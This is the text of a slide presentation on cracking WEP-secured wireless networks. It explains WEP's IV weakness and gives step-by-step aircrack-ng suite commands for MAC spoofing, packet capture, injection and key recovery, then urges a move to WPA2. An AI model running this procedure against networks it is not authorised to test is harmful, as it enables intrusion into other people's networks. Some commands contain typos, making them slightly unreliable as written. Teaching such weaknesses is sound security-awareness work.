1. Cracking WEP Secured
Wireless Networks
Hammam Samara

2. What is WEP
Stands for Wired Equivalent Privacy.
13 years old protocol. (even older than Google!).
Several serious weaknesses in this protocol have been
identified since the early starts.
Can be cracked with readily available software within
minutes!
I never believed until try it my self! - so this session.
Despite that, WEP is still widely in use! and often the first
security choice presented to user by router config. tools.

3. WEP Authentication
Two methods of authentication can be used with WEP:
Open System authentication
After the authentication and association, the client
needs to have the right keys.
Shared Key authentication.
Four-way challenge-response handshake is used.
Which way is Stronger ?

4. How is works
Basic WEP encryption: RC4 keystream XORed with plain-text.

5. So, Where is the weakness?
In the IV's it selves!
a 24-bit IV is not long enough to ensure this on a busy
network.
There is a 50% probability the same IV will repeat after
5000 packets.
Network not busy ?
We could make it so! ;-)
There are ways for an attacker to send packets on the
network and thereby stimulate reply packets which can
then be inspected to find the key.
Now freely available software such as aircrack-ng can
crack any WEP key in minutes.

6. Still Not believe it ?
I used to too.

7. Lets Try it
Requirements:
BackTrack 3 on CD or USB.
Computer with compatible 802.11 wireless card.
Wireless Access point or WIFI router using WEP
encryption.

8. Enabling Monitor Mode.
Procedure:
Boot From Backtrack3 Live CD and open kernal window.
First is enabling "Monitor mode" for your wifi card.
For Intel PROWireless3945ABG
modprobe -r iwl3945
modprobe ipwraw
Now Stop the wifi card.
iwconfig
airmon-ng stop [device]
airmon-ng [device] down
Change the mac address to a fake one:
macchanger --mac 00:11:22:33:44:55 [device]
airmong-ng start [device]

9. Attacking The target.
Procedure:
Discover all wireless network in range.
We will using AiroDump for this purpose.
airodump-ng [device]
Now Choose a target.
airodump-ng -c [channel] -w [filename] --bssid
[bssied] [device]
Now to speed up the data output:(open another consol)
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e
[essid] [devcie]
aireply-ng -3 -b [bssid] -h 00:11:22:33:44:
55 [device]

10. Attacking The target.
Procedure:
Now if you have enough packets, you can begin the crack.
But if not ? use the following command
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b
[bssid] -h 00:11:22:33:44:55 [device]
This will force the AP to generate more and more
packets.
Wait after you get > 20,000 packets and start new consol
window.
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
you may also try -n to be 64 bit if cracking fails.
Once the Aircrack is done, you will be left with the key!

11. Now What you could do about it ?
Nothing!
Just Move to WPA (Wi-Fi Protected Access) wireless
security.
But while you there switching your security protocols,
what about choosing WPA2.
For you it is just an option, but actually you are making a
big difference for your network crackers.

12. Thank you For Lestining.
And Do not forget to secure your
wireless

13. Materials
BackTrack3 ISO File:
FTP: http://www.filewatcher.com/m/bt3-final.iso.728705024.0.0.html
Torrent: http://thepiratebay.org/torrent/4250350/Backtrack_3_Final_-_ISO
Step by Step tutorial: http://goo.gl/1Yq2
Video tutorial: http://www.youtube.com/watch?v=kDD9PjiQ2_U
Cracking WEP on Windows: http://tazforum.thetazzone.com/viewtopic.php?t=2069.